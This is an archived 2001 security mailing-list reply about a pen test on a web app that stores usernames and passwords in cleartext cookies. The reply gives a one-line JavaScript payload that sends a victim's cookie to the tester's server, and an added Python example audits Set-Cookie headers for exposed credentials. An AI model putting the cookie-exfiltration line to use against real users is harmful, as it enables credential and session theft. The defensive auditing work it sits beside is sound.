Joe,

>I'm working on a pen test for a web application. After
>the first time you successfully authenticate, the app
>stores a cookie with username and password in clear
>text. I've recently read the archive regarding
>vulnerable IE browsers revealing cookies. I'd like to
>go a step farther. Does anyone have a script that will
>email the cookie? I'd like to craft an email with a link
>and when a user clicks, it emails the cookie.

.. not really necessary ..

javascript:location.href=yoururl?[found cookie value]

.. creates log-file entry with cookie value on (hopefully) your server ...

rC
securityat_private
http://www.freefly.com/security/
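The finding discussed in this thread, seen from the reporting side, as an added example that is not part of the original posts: a Python check run over captured Set-Cookie headers that flags cookies carrying a test account's credentials (raw, URL-encoded or base64-encoded) and whether script can read them. The function names, the test account and the sample headers are constructed for illustration.

```python
import base64
import binascii
from urllib.parse import unquote


def candidate_decodings(value):
    """Return the raw cookie value plus trivially reversible decodings of it."""
    forms = {value, unquote(value)}
    try:
        padded = value + "=" * (-len(value) % 4)
        forms.add(base64.b64decode(padded, validate=True).decode("utf-8"))
    except (binascii.Error, UnicodeDecodeError, ValueError):
        pass  # not base64 text; the raw and URL-decoded forms still apply
    return forms


def audit_set_cookie(header_value, username, password):
    """Audit one Set-Cookie header value against the test account's credentials."""
    parts = [p.strip() for p in header_value.split(";")]
    name, _, value = parts[0].partition("=")
    # Attribute names only (path, expires, secure, httponly, ...), lowercased.
    attrs = {p.partition("=")[0].strip().lower() for p in parts[1:] if p}
    findings = []
    forms = candidate_decodings(value.strip('"'))
    if any(password in f for f in forms):
        findings.append("password-in-cookie")
    if any(username in f for f in forms):
        findings.append("username-in-cookie")
    if "httponly" not in attrs:
        findings.append("readable-by-script")    # document.cookie exposes it
    if "secure" not in attrs:
        findings.append("sent-over-plain-http")
    if "expires" in attrs or "max-age" in attrs:
        findings.append("persisted-to-disk")     # survives browser restart
    return name.strip(), findings


# Constructed sample headers for a throwaway test account (not from the post).
SAMPLES = [
    "login=user=jdoe&pass=Winter2001; path=/; expires=Fri, 31 Dec 2010 23:59:59 GMT",
    "auth=amRvZTpXaW50ZXIyMDAx; Path=/; HttpOnly",
    "sid=9f2c4e7ab1d04c55; Path=/; Secure; HttpOnly",
]

if __name__ == "__main__":
    for header in SAMPLES:
        print(audit_set_cookie(header, "jdoe", "Winter2001"))
```

An opaque, server-side session identifier (the third sample) produces no findings; the first two show why a credential-bearing cookie is reportable even when it is encoded or marked HttpOnly.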
This archive was generated by hypermail 2b30 : Mon Dec 03 2001 - 12:18:44 PST